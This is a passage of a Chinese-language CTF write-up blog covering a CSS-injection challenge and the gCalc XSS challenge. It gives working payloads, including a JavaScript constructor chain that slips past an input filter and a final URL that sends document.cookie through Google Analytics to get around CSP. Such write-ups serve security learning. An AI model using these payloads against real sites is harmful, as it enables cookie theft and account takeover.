<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">secret(data) &#123; display(<span class="string">"Successfully changed secret to &lt;span data-secret="</span>$&#123;esc(cookie(<span class="string">'flag'</span>))&#125;<span class="string">"&gt;*****&lt;/span&gt;"</span>); &#125;</span><br></pre></td></tr></table></figure>
<p>因此处理逻辑如下:</p>
<blockquote>
<p>/secret --&gt; send() --&gt; handle() --&gt;display</p>
</blockquote>
<p>我们需要在<code>display</code>这一步获得未被修改的flag，这里需要使用到cookie的一个tip，我们可以通过设置<code>domain</code>参数来将<code>send()</code>这一步的cookie设置到其他域名下去，这样就不会干扰到正常的flag.</p>
<p>因此可以完成攻击:</p>
<blockquote>
<p>how about dog?</p>
<p>/name a ] {background:url(/room/41f4aab8-577a-4cf0-8948-7afd4e8e0d47/send?name=admin&amp;msg=/secret a; <a href="http://Domain=xxx.com" target="_blank" rel="noopener">Domain=xxx.com</a>);} {} span[data-secret^=CTF{] {background:url(/room/84b4b69a-d01d-45c3-b2c5-eb5d55abd734/send?name=admin&amp;msg=CTF);}</p>
<p>/report</p>
</blockquote>
<h2 id="gcalc"><a class="markdownIt-Anchor" href="#gcalc"></a> gCalc</h2>
<p>首先给了我们一个计算器页面，其中有两个链接，一个是<code>permalink</code>，一个是<code>try it</code> 。</p>
<p>随意尝试了下计算器的点击，发现并没有什么异常，此时再点击<code>permalink</code>，返回一个url</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://gcalc2.web.ctfcompetition.com/?expr=6*3&amp;vars=&#123; &quot;pi &quot;:3.14159%2C &quot;ans &quot;:0&#125;</span><br></pre></td></tr></table></figure>
<p>编码一下就是</p>
<blockquote>
<p><a href="https://gcalc2.web.ctfcompetition.com/?expr=6*3&amp;vars=%7B%22pi%22:3.14159,%22ans%22:0%7D" target="_blank" rel="noopener">https://gcalc2.web.ctfcompetition.com/?expr=6*3&amp;vars={“pi”:3.14159,“ans”:0}</a></p>
</blockquote>
<p>可以看到，expr参数对应的是我们的计算式，而vars参数则对应定义的变量。如果在我们的计算式里包含了<code>π</code>,则会产生如下的url</p>
<blockquote>
<p><a href="https://gcalc2.web.ctfcompetition.com/?expr=6*3" target="_blank" rel="noopener">https://gcalc2.web.ctfcompetition.com/?expr=6*3</a> vars.pi&amp;vars={“pi”:3.14159,“ans”:0}</p>
</blockquote>
<p>可以发现，<code>π</code>此类变量是通过<code>vars</code>来调用的。</p>
<p><code>try it</code>链接点击后会发送数据</p>
<blockquote>
<p><a href="https://sandbox-gcalc2.web.ctfcompetition.com/report" target="_blank" rel="noopener">https://sandbox-gcalc2.web.ctfcompetition.com/report</a></p>
</blockquote>
<p>数据格式如下:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">    &quot;expr&quot;:&quot;&quot;,</span><br><span class="line">    &quot;vars&quot;:&quot;&#123;\&quot;pi\&quot;:3.14159,\&quot;ans\&quot;:0&#125;&quot;,</span><br><span class="line">&quot;recaptcha&quot;:&quot;03ACgFB9vFkpWHsefHDroUbtLyvPX8NPVXNMNGCF7KqUrfnZvBJxktyHeHKiRb7jnGeSHjjC41mKoFwQaHmrmTv_DNCFf6A7_JNSMtRkor2qELH9E6C5ZMnstpC0FphgFAYHGYNQovlPXOuH7eGM0p3PEDrvaGptUsQmgpVmjqs1BQDTlgMzRK6sc7f4PcgjRpLdqHlPQWqR2T_lPt1wZMNUQaZX_jmsSfrKzt3mYAQZUAjtUwPdYPtX7mkdcycub5hPoEhgbNkddp7BC1ZNtyjwaFpuSCsQNFZmLlwiFJtooeyvg-v4iQBC80rH0ia7cgmS5NTyabgP6r69GpE4Z67rgT9FCSJw-T9QYzJ5RPr25pzjJGLOCClf1M3Bkv_cQopT_SHOLbRvLbtCat48-VnSHOUJjWFez17Vur6rdB_CIBDwJ1GUdy4Ie5AEOP5ojFI2LrgtV2WGYY8ZMTikcVLxR83DYEyLb_Hr3ap9qIQvc8TZNqQNc_34U&quot;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p>同时，根据<code>Computer too slow? Try it on our i386 beowulf cluster.</code>可以推测出我们的计算式在被发送后会被解析，这也就意味着<code>vars.pi</code>这一类的变量会被解析。</p>
<p>那么下一步的思路就是:<code>通过构造vars，使得服务端解析计算式时触发xss</code></p>
<p>我们可以在页面中发现计算器的源码，其中涉及到<code>vars</code>以及<code>expr</code>构造的代码为:</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">p</span>(<span class="params">a, b</span>) </span>&#123;</span><br><span class="line">    a = <span class="built_in">String</span>(a).toLowerCase();</span><br><span class="line">    b = <span class="built_in">String</span>(b);</span><br><span class="line">    <span class="keyword">if</span> (!<span class="regexp">/^(?:[\(\)\*\/\+%\-0-9 ]|\bvars\b|[.]\w+)*$/</span>.test(a)) <span class="keyword">throw</span> <span class="built_in">Error</span>(a);</span><br><span class="line">    b = <span class="built_in">JSON</span>.parse(b, <span class="function"><span class="keyword">function</span>(<span class="params">a, b</span>) </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (b &amp;&amp; <span class="string">"object"</span> === <span class="keyword">typeof</span> b &amp;&amp; !<span class="built_in">Array</span>.isArray(b)) <span class="keyword">return</span> <span class="built_in">Object</span>.assign(<span class="built_in">Object</span>.create(<span class="literal">null</span>), b);</span><br><span class="line">        <span class="keyword">if</span> (<span class="string">"number"</span> === <span class="keyword">typeof</span> b) <span class="keyword">return</span> b</span><br><span class="line">    &#125;);</span><br><span class="line">    <span class="keyword">return</span> (<span class="keyword">new</span> <span class="built_in">Function</span>(<span class="string">"vars"</span>, <span class="string">"return "</span> + a))(b)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">r</span>(<span class="params">a</span>) </span>&#123;</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> p(a.a, <span class="built_in">JSON</span>.stringify(a.b))</span><br><span class="line">    &#125; <span class="keyword">catch</span> (b) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">"Error"</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>其中，源码对<code>a</code>的格式进行了限制，将正则表达式放入正则分析的网站，可以得到分析结果，我们带入的变量必须以<code>vars.</code>开头，并且可以代入括号，比如:<code>(vars.pi(vars.pi()))</code>便可以进行匹配。因此我们需要构造一个使用括号与点就能完成攻击的paylaod。因为使用了<code>toLowerCase()</code>，因此常见的函数如:<code>fromCharCode</code>、<code>toString()</code>这一类都是无法使用的，然后在这里卡住了…</p>
<p>随后在github上看到了使用<code>constructor</code>来进行xss的payload，可以做到只使用点和括号完成攻击。然后使用payload</p>
<blockquote>
<p><a href="https://gcalc2.web.ctfcompetition.com/?expr=constructor.constructor(vars.c)&amp;vars=" target="_blank" rel="noopener">https://gcalc2.web.ctfcompetition.com/?expr=constructor.constructor(vars.c)&amp;vars=</a>{ &quot;pi &quot;:3.14159, &quot;ans &quot;:0, &quot;c &quot;: &quot;alert(1) &quot;}</p>
</blockquote>
<p>然而失败了Orz…</p>
<p>随后把我的payload放进正则匹配的网站试了下，发现是正则匹配出了问题，继续分析正则，随后我又构造出了一个payload</p>
<blockquote>
<p><a href="https://sandbox-gcalc2.web.ctfcompetition.com/static/calc.html?expr=(1).constructor.constructor(vars.c)()&amp;vars=" target="_blank" rel="noopener">https://sandbox-gcalc2.web.ctfcompetition.com/static/calc.html?expr=(1).constructor.constructor(vars.c)()&amp;vars=</a>{ &quot;pi &quot;:3.14159, &quot;ans &quot;:0, &quot;c &quot;: &quot;alert(1) &quot;}</p>
</blockquote>
<p>这个payload在我本地可以成功执行，但是在题目中却失效了。</p>
<p>后面经过师傅的提醒，发现key-value对中，只能使用数字作为value，因此只能将我们的payload放在键值中。分析一下payload的结构，首先使用<code>(1).constructor.constructor</code>引入<code>function</code>，控制台里输出的内容是:<code>ƒ Function() { [native code] }</code>，因此需要在构造器中传入我们的函数，所以我们可以构造出</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">vars = &#123;&quot;pi&quot;:3.14159,&quot;ans&quot;:0,&quot;alert(1)&quot;:0&#125;</span><br></pre></td></tr></table></figure>
<p>如果想要执行<code>alert</code>函数，那么我们需要将alert代入构造函数中，因此我们可以使用<code>keys.pop()</code>，而keys的语法为<code>Object.keys()</code>，因此我还需要构造一个Object,最终payload为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">https://sandbox-gcalc2.web.ctfcompetition.com/static/calc.html?expr=(1).constructor.constructor((1*1).__proto__.__proto__.constructor.keys(vars).pop())()&amp;vars=&#123;&quot;pi&quot;:3.14159,&quot;ans&quot;:0,&quot;alert(1)&quot;:0&#125;</span><br></pre></td></tr></table></figure>
<p>原理如下:</p>
<p>keys函数需要Object对象触发，因此我们需要构造一个Object，可以使用的符号包括 <code>* / + _ ?</code> 使用以上符号构造表达式，查看属性，其中我看到<code>(1*1)</code>的原型链中出现了Object，但是需要两次调用，可以构造<code>(1*1).__proto__.__proto__.constructor.keys(vars).pop()</code>来获取<code>alert(1)</code>。</p>
<p>现在可以执行alert了，但是网页仍然存在CSP头，先看看CSP:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">default-src &apos;self&apos;; </span><br><span class="line"></span><br><span class="line">frame-ancestors https://gcalc2.web.ctfcompetition.com/;</span><br><span class="line"></span><br><span class="line">font-src https://fonts.gstatic.com; </span><br><span class="line"></span><br><span class="line">style-src &apos;self&apos; https://*.googleapis.com &apos;unsafe-inline&apos;; </span><br><span class="line"></span><br><span class="line">script-src &apos;self&apos; https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.google-analytics.com https://*.googleapis.com &apos;unsafe-eval&apos; https://www.googletagmanager.com; </span><br><span class="line"></span><br><span class="line">child-src https://www.google.com/recaptcha/; </span><br><span class="line"></span><br><span class="line">img-src https://www.google-analytics.com;</span><br></pre></td></tr></table></figure>
<p>重点在最后一条规则 <code>img-src</code>，我们可以通过设置GA，并将img标签的src设置为对应的网页，即可获取cookie，payload如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">https://sandbox-gcalc2.web.ctfcompetition.com/static/calc.html?expr=(1).constructor.constructor((1*1).__proto__.__proto__.constructor.keys(vars).pop())()&amp;vars=&#123; &quot;pi &quot;:3.14159, &quot;ans &quot;:0, &quot;x%3Ddocument.createElement(%27img%27);x.src%3D%27https:%2F%2Fwww.google-analytics.com%2Fr%2Fcollect%3Fv%3D1&amp;tid=UA-121644461-1&amp;cid=00000000000000000&amp;t=event&amp;ec=email&amp;ea=%27%20encodeURIComponent(document.cookie);document.querySelector(%27body%27).append(x) &quot;:0&#125;</span><br></pre></td></tr></table></figure>

    </div>

    
</div>
    <div class="footer" id="footer">
    <p>Copyright © 2020 Meizj.
        <!-- <label class="el-switch el-switch-green el-switch-sm" style="vertical-align: sub;">
            <input type="checkbox" name="switch" id="update_style">
            <span class="el-switch-style"></span>
        </label> -->
<!--         <script type="text/javascript">
        var cnzz_protocol = (("https:" == document.location.protocol) ? "https://" : "http://");
        document.write(unescape("%3Cspan id='cnzz_stat_icon_1278548644'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "v1.cnzz.com/stat.php%3Fid%3D1278548644%26show%3Dpic1' type='text/javascript'%3E%3C/script%3E"));
        </script> -->
    </p>
</div>
<input type="hidden" id="web_style" value="white">
<input type="hidden" id="valine_appid" value="CmCti21ooOOIzFOhEyFkFvR0-gzGzoHsz">
<input type="hidden" id="valine_appKey" value="FqiyUqbg7McKN2eG0MCewupf">
<script src="/libs/jquery.min.js"></script>
<script src="/libs/highlight/highlight.pack.js"></script>
<script src='//cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js'></script>
<script src="//unpkg.com/heti/umd/heti-addon.min.js"></script>
<script>
    const heti = new Heti('.heti');
    heti.autoSpacing();
</script>
<script async src="https://www.googletagmanager.com/gtag/js?id=G-5JET59Z93Q"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-5JET59Z93Q');
</script>
<script src="/js/js.js"></script>
<style type="text/css">
.v * {
    color: #698fca;
}

.v .vlist .vcard .vhead .vsys {
    color: #3a3e4a;
}

.v .vlist .vcard .vh .vmeta .vat {
    color: #638fd5;
}

.v .vlist .vcard .vhead .vnick {
    color: #6ba1ff;
}

.v a {
    color: #8696b1;
}

.v .vlist .vcard .vhead .vnick:hover {
    color: #669bfc;
}
</style>
</body>

</html>